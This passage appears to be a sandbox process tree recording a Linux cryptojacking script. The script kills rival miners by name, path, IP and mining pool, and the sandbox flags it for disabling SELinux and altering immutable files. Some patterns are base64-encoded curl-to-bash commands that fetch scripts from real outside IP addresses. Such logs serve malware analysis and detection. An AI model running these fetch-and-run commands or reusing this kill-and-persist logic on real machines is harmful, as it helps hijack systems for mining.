  PID:1361
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1370
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1369
- /bin/grep
  grep kdevtmpfsi
  2⤵
  PID:1368
- /bin/grep
  grep -v grep
  2⤵
  PID:1367
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1366
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1375
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1374
- /bin/grep
  grep kinsing
  2⤵
  PID:1373
- /bin/grep
  grep -v grep
  2⤵
  PID:1372
- /bin/ps
  ps aux
  2⤵
  PID:1371
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1380
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1379
- /bin/grep
  grep redis2
  2⤵
  PID:1378
- /bin/grep
  grep -v grep
  2⤵
  PID:1377
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1376
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1385
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1386
- /bin/grep
  grep " ps"
  2⤵
  PID:1384
- /bin/grep
  grep -v aux
  2⤵
  PID:1383
- /bin/grep
  grep -v grep
  2⤵
  PID:1382
- /bin/ps
  ps aux
  2⤵
  PID:1381
- /bin/grep
  grep sync_supers
  2⤵
  PID:1389
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1391
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1390
- /bin/grep
  grep -v grep
  2⤵
  PID:1388
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1387
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1396
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1395
- /bin/grep
  grep cpuset
  2⤵
  PID:1394
- /bin/grep
  grep -v grep
  2⤵
  PID:1393
- /bin/ps
  ps aux
  2⤵
  PID:1392
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1402
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1401
- /bin/grep
  grep "x]"
  2⤵
  PID:1400
- /bin/grep
  grep -v aux
  2⤵
  PID:1399
- /bin/grep
  grep -v grep
  2⤵
  PID:1398
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1397
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1408
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1407
- /bin/grep
  grep "sh] <"
  2⤵
  PID:1406
- /bin/grep
  grep -v aux
  2⤵
  PID:1405
- /bin/grep
  grep -v grep
  2⤵
  PID:1404
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1403
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1414
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1413
- /bin/grep
  grep " \\[]"
  2⤵
  PID:1412
- /bin/grep
  grep -v aux
  2⤵
  PID:1411
- /bin/grep
  grep -v grep
  2⤵
  PID:1410
- /bin/ps
  ps aux
  2⤵
  PID:1409
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1419
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1418
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:1417
- /bin/grep
  grep -v grep
  2⤵
  PID:1416
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1415
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1424
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1423
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:1422
- /bin/grep
  grep -v grep
  2⤵
  PID:1421
- /bin/ps
  ps aux
  2⤵
  PID:1420
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1429
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1428
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1427
- /bin/grep
  grep -v grep
  2⤵
  PID:1426
- /bin/ps
  ps aux
  2⤵
  PID:1425
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1434
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1433
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:1432
- /bin/grep
  grep -v grep
  2⤵
  PID:1431
- /bin/ps
  ps aux
  2⤵
  PID:1430
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1439
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1438
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:1437
- /bin/grep
  grep -v grep
  2⤵
  PID:1436
- /bin/ps
  ps aux
  2⤵
  PID:1435
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1444
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1443
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:1442
- /bin/grep
  grep -v grep
  2⤵
  PID:1441
- /bin/ps
  ps aux
  2⤵
  PID:1440
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1449
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1448
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:1447
- /bin/grep
  grep -v grep
  2⤵
  PID:1446
- /bin/ps
  ps aux
  2⤵
  PID:1445
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1454
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1453
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:1452
- /bin/grep
  grep -v grep
  2⤵
  PID:1451
- /bin/ps
  ps aux
  2⤵
  PID:1450
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1459
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1458
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:1457
- /bin/grep
  grep -v grep
  2⤵
  PID:1456
- /bin/ps
  ps aux
  2⤵
  PID:1455
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1464
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1463
- /bin/grep
  grep sustse
  2⤵
  PID:1462
- /bin/grep
  grep -v grep
  2⤵
  PID:1461
- /bin/ps
  ps aux
  2⤵
  PID:1460
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1469
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1468
- /bin/grep
  grep sustse3
  2⤵
  PID:1467
- /bin/grep
  grep -v grep
  2⤵
  PID:1466
- /bin/ps
  ps aux
  2⤵
  PID:1465
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1475
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1474
- /bin/grep
  grep wget
  2⤵
  PID:1473
- /bin/grep
  grep mr.sh
  2⤵
  PID:1472
- /bin/grep
  grep -v grep
  2⤵
  PID:1471
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1470
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1481
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1480
- /bin/grep
  grep curl
  2⤵
  PID:1479
- /bin/grep
  grep mr.sh
  2⤵
  PID:1478
- /bin/grep
  grep -v grep
  2⤵
  PID:1477
- /bin/ps
  ps aux
  2⤵
  PID:1476
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1487
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1486
- /bin/grep
  grep wget
  2⤵
  PID:1485
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:1484
- /bin/grep
  grep -v grep
  2⤵
  PID:1483
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1482
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1493
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1492
- /bin/grep
  grep curl
  2⤵
  PID:1491
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:1490
- /bin/grep
  grep -v grep
  2⤵
  PID:1489
- /bin/ps
  ps aux
  2⤵
  PID:1488
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1499
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1498
- /bin/grep
  grep wget
  2⤵
  PID:1497
- /bin/grep
  grep cr5.sh
  2⤵
  PID:1496
- /bin/grep
  grep -v grep
  2⤵
  PID:1495
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1494
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1505
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1504
- /bin/grep
  grep curl
  2⤵
  PID:1503
- /bin/grep
  grep cr5.sh
  2⤵
  PID:1502
- /bin/grep
  grep -v grep
  2⤵
  PID:1501
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1500
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1511
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1510
- /bin/grep
  grep wget
  2⤵
  PID:1509
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:1508
- /bin/grep
  grep -v grep
  2⤵
  PID:1507
- /bin/ps
  ps aux
  2⤵
  PID:1506
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1517
- /bin/grep
  grep curl
  2⤵
  PID:1515
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:1514
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1516
- /bin/grep
  grep -v grep
  2⤵
  PID:1513
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1512
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1522
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1521
- /bin/grep
  grep j2.conf
  2⤵
  PID:1520
- /bin/grep
  grep -v grep
  2⤵
  PID:1519
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1518
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1528
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1527
- /bin/grep
  grep wget
  2⤵
  PID:1526
- /bin/grep
  grep luk-cpu
  2⤵
  PID:1525
- /bin/grep
  grep -v grep
  2⤵
  PID:1524
- /bin/ps
  ps aux
  2⤵
  PID:1523
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1534
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1533
- /bin/grep
  grep curl
  2⤵
  PID:1532
- /bin/grep
  grep luk-cpu
  2⤵
  PID:1531
- /bin/grep
  grep -v grep
  2⤵
  PID:1530
- /bin/ps
  ps aux
  2⤵
  PID:1529
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1540
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1539
- /bin/grep
  grep wget
  2⤵
  PID:1538
- /bin/grep
  grep ficov
  2⤵
  PID:1537
- /bin/grep
  grep -v grep
  2⤵
  PID:1536
- /bin/ps
  ps aux
  2⤵
  PID:1535
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1546
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1545
- /bin/grep
  grep curl
  2⤵
  PID:1544
- /bin/grep
  grep ficov
  2⤵
  PID:1543
- /bin/grep
  grep -v grep
  2⤵
  PID:1542
- /bin/ps
  ps aux
  2⤵
  PID:1541
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1552
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1551
- /bin/grep
  grep wget
  2⤵
  PID:1550
- /bin/grep
  grep he.sh
  2⤵
  PID:1549
- /bin/grep
  grep -v grep
  2⤵
  PID:1548
- /bin/ps
  ps aux
  2⤵
  PID:1547
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1558
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1557
- /bin/grep
  grep curl
  2⤵
  PID:1556
- /bin/grep
  grep he.sh
  2⤵
  PID:1555
- /bin/grep
  grep -v grep
  2⤵
  PID:1554
- /bin/ps
  ps aux
  2⤵
  PID:1553
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1564
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1563
- /bin/grep
  grep wget
  2⤵
  PID:1562
- /bin/grep
  grep miner.sh
  2⤵
  PID:1561
- /bin/grep
  grep -v grep
  2⤵
  PID:1560
- /bin/ps
  ps aux
  2⤵
  PID:1559
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1570
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1569
- /bin/grep
  grep curl
  2⤵
  PID:1568
- /bin/grep
  grep miner.sh
  2⤵
  PID:1567
- /bin/grep
  grep -v grep
  2⤵
  PID:1566
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1565
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1576
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1575
- /bin/grep
  grep wget
  2⤵
  PID:1574
- /bin/grep
  grep nullcrew
  2⤵
  PID:1573
- /bin/grep
  grep -v grep
  2⤵
  PID:1572
- /bin/ps
  ps aux
  2⤵
  PID:1571
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1582
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1581
- /bin/grep
  grep curl
  2⤵
  PID:1580
- /bin/grep
  grep nullcrew
  2⤵
  PID:1579
- /bin/grep
  grep -v grep
  2⤵
  PID:1578
- /bin/ps
  ps aux
  2⤵
  PID:1577
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1587
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1586
- /bin/grep
  grep 107.174.47.156
  2⤵
  PID:1585
- /bin/grep
  grep -v grep
  2⤵
  PID:1584
- /bin/ps
  ps aux
  2⤵
  PID:1583
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1592
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1591
- /bin/grep
  grep 83.220.169.247
  2⤵
  PID:1590
- /bin/grep
  grep -v grep
  2⤵
  PID:1589
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1588
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1597
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1596
- /bin/grep
  grep 51.38.203.146
  2⤵
  PID:1595
- /bin/grep
  grep -v grep
  2⤵
  PID:1594
- /bin/ps
  ps aux
  2⤵
  PID:1593
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1602
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1601
- /bin/grep
  grep 144.217.45.45
  2⤵
  PID:1600
- /bin/grep
  grep -v grep
  2⤵
  PID:1599
- /bin/ps
  ps aux
  2⤵
  PID:1598
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1607
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1606
- /bin/grep
  grep 107.174.47.181
  2⤵
  PID:1605
- /bin/grep
  grep -v grep
  2⤵
  PID:1604
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1603
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1612
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1611
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:1610
- /bin/grep
  grep -v grep
  2⤵
  PID:1609
- /bin/ps
  ps aux
  2⤵
  PID:1608
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1617
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1616
- /bin/grep
  grep mine.moneropool.com
  2⤵
  PID:1615
- /bin/grep
  grep -v grep
  2⤵
  PID:1614
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:1613
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1622
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1621
- /bin/grep
  grep pool.t00ls.ru
  2⤵
  PID:1620
- /bin/grep
  grep -v grep
  2⤵
  PID:1619
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1618
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1627
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1626
- /bin/grep
  grep xmr.crypto-pool.fr:8080
  2⤵
  - Disables SELinux
  PID:1625
- /bin/grep
  grep -v grep
  2⤵
  PID:1624
- /bin/ps
  ps auxf
  2⤵
  PID:1623
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1632
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1631
- /bin/grep
  grep xmr.crypto-pool.fr:3333
  2⤵
  PID:1630
- /bin/grep
  grep -v grep
  2⤵
  PID:1629
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1628
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1637
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1636
- /bin/grep
  grep "[email protected]"
  2⤵
  PID:1635
- /bin/grep
  grep -v grep
  2⤵
  PID:1634
- /bin/ps
  ps auxf
  2⤵
  PID:1633
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1642
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1641
- /bin/grep
  grep monerohash.com
  2⤵
  PID:1640
- /bin/grep
  grep -v grep
  2⤵
  PID:1639
- /bin/ps
  ps auxf
  2⤵
  PID:1638
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1647
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1646
- /bin/grep
  grep /tmp/a7b104c270
  2⤵
  - Disables SELinux
  PID:1645
- /bin/grep
  grep -v grep
  2⤵
  PID:1644
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:1643
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1652
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1651
- /bin/grep
  grep xmr.crypto-pool.fr:6666
  2⤵
  PID:1650
- /bin/grep
  grep -v grep
  2⤵
  PID:1649
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:1648
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1657
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1656
- /bin/grep
  grep xmr.crypto-pool.fr:7777
  2⤵
  PID:1655
- /bin/grep
  grep -v grep
  2⤵
  PID:1654
- /bin/ps
  ps auxf
  2⤵
  PID:1653
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1662
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1661
- /bin/grep
  grep xmr.crypto-pool.fr:443
  2⤵
  PID:1660
- /bin/grep
  grep -v grep
  2⤵
  PID:1659
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:1658
- /bin/grep
  grep stratum.f2pool.com:8888
  2⤵
  PID:1665
- /bin/grep
  grep -v grep
  2⤵
  PID:1664
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1666
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:1663
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1667
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1672
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1671
- /bin/grep
  grep xmrpool.eu
  2⤵
  PID:1670
- /bin/grep
  grep -v grep
  2⤵
  PID:1669
- /bin/ps
  ps auxf
  2⤵
  PID:1668
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1677
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1676
- /bin/grep
  grep kieuanilam.me
  2⤵
  PID:1675
- /bin/grep
  grep -v grep
  2⤵
  PID:1674
- /bin/ps
  ps auxf
  2⤵
  PID:1673
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1681
- - /usr/local/sbin/kill
    kill -9 1679
    3⤵
    PID:1682
- - /usr/local/bin/kill
    kill -9 1679
    3⤵
    PID:1682
- - /usr/sbin/kill
    kill -9 1679
    3⤵
    PID:1682
- - /usr/bin/kill
    kill -9 1679
    3⤵
    PID:1682
- - /sbin/kill
    kill -9 1679
    3⤵
    PID:1682
- - /bin/kill
    kill -9 1679
    3⤵
    - Reads CPU attributes
    PID:1682
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1680
- /bin/grep
  grep xiaoyao
  2⤵
  PID:1679
- /bin/ps
  ps auxf
  2⤵
  PID:1678
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1686
- - /usr/local/sbin/kill
    kill -9 1684
    3⤵
    PID:1687
- - /usr/local/bin/kill
    kill -9 1684
    3⤵
    PID:1687
- - /usr/sbin/kill
    kill -9 1684
    3⤵
    PID:1687
- - /usr/bin/kill
    kill -9 1684
    3⤵
    PID:1687
- - /sbin/kill
    kill -9 1684
    3⤵
    PID:1687
- - /bin/kill
    kill -9 1684
    3⤵
    PID:1687
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1685
- /bin/grep
  grep xiaoxue
  2⤵
  PID:1684
- /bin/ps
  ps auxf
  2⤵
  PID:1683
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1692
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1691
- /bin/grep
  grep :14444
  2⤵
  PID:1690
- /bin/grep
  grep -v grep
  2⤵
  PID:1689
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1698
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:1697
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1696
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:1695
- /bin/grep
  grep 46.243.253.15
  2⤵
  PID:1694
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1704
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:1703
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1702
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:1701
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:1700
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1706
- /usr/bin/pgrep
  pgrep -f L2Jpbi9iYXN
  2⤵
  PID:1705
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1708
- /usr/bin/pgrep
  pgrep -f xzpauectgr
  2⤵
  PID:1707
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1710
- /usr/bin/pgrep
  pgrep -f slxfbkmxtd
  2⤵
  PID:1709
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1712
- /usr/bin/pgrep
  pgrep -f mixtape
  2⤵
  PID:1711
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1714
- /usr/bin/pgrep
  pgrep -f addnj
  2⤵
  - Reads CPU attributes
  PID:1713
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1716
- /usr/bin/pgrep
  pgrep -f 200.68.17.196
  2⤵
  - Reads CPU attributes
  PID:1715
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1718
- /usr/bin/pgrep
  pgrep -f IyEvYmluL3NoCgpzUG
  2⤵
  PID:1717
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1720
- /usr/bin/pgrep
  pgrep -f KHdnZXQgLXFPLSBodHRw
  2⤵
  PID:1719
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1722
- /usr/bin/pgrep
  pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3
  2⤵
  PID:1721
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1724
- /usr/bin/pgrep
  pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo
  2⤵
  PID:1723
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1726
- /usr/bin/pgrep
  pgrep -f mwyumwdbpq.conf
  2⤵
  PID:1725
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1728
- /usr/bin/pgrep
  pgrep -f honvbsasbf.conf
  2⤵
  - Reads CPU attributes
  PID:1727
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1730
- /usr/bin/pgrep
  pgrep -f mqdsflm.cf
  2⤵
  - Reads runtime system information
  PID:1729
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1732
- /usr/bin/pgrep
  pgrep -f lower.sh
  2⤵
  - Reads runtime system information
  PID:1731
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1734
- /usr/bin/pgrep
  pgrep -f ./ppp
  2⤵
  PID:1733
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1736
- /usr/bin/pgrep
  pgrep -f cryptonight
  2⤵
  - Reads runtime system information
  PID:1735
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1738
- /usr/bin/pgrep
  pgrep -f ./seervceaess
  2⤵
  PID:1737
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1740
- /usr/bin/pgrep
  pgrep -f ./servceaess
  2⤵
  - Reads runtime system information
  PID:1739
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1742
- /usr/bin/pgrep
  pgrep -f ./servceas
  2⤵
  PID:1741
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1744
- /usr/bin/pgrep
  pgrep -f ./servcesa
  2⤵
  PID:1743
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1746
- /usr/bin/pgrep
  pgrep -f ./vsp
  2⤵
  PID:1745
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1748
- /usr/bin/pgrep
  pgrep -f ./jvs
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1747
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1750
- /usr/bin/pgrep
  pgrep -f ./pvv
  2⤵
  - Reads CPU attributes
  PID:1749
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1752
- /usr/bin/pgrep
  pgrep -f ./vpp
  2⤵
  PID:1751
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1754
- /usr/bin/pgrep
  pgrep -f ./pces
  2⤵
  PID:1753
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1756
- /usr/bin/pgrep
  pgrep -f ./rspce
  2⤵
  - Reads CPU attributes
  PID:1755
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1758
- /usr/bin/pgrep
  pgrep -f ./haveged
  2⤵
  - Reads runtime system information
  PID:1757
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1760
- /usr/bin/pgrep
  pgrep -f ./jiba
  2⤵
  - Reads runtime system information
  PID:1759
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1762
- /usr/bin/pgrep
  pgrep -f ./watchbog
  2⤵
  - Reads CPU attributes
  PID:1761
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1764
- /usr/bin/pgrep
  pgrep -f ./A7mA5gb
  2⤵
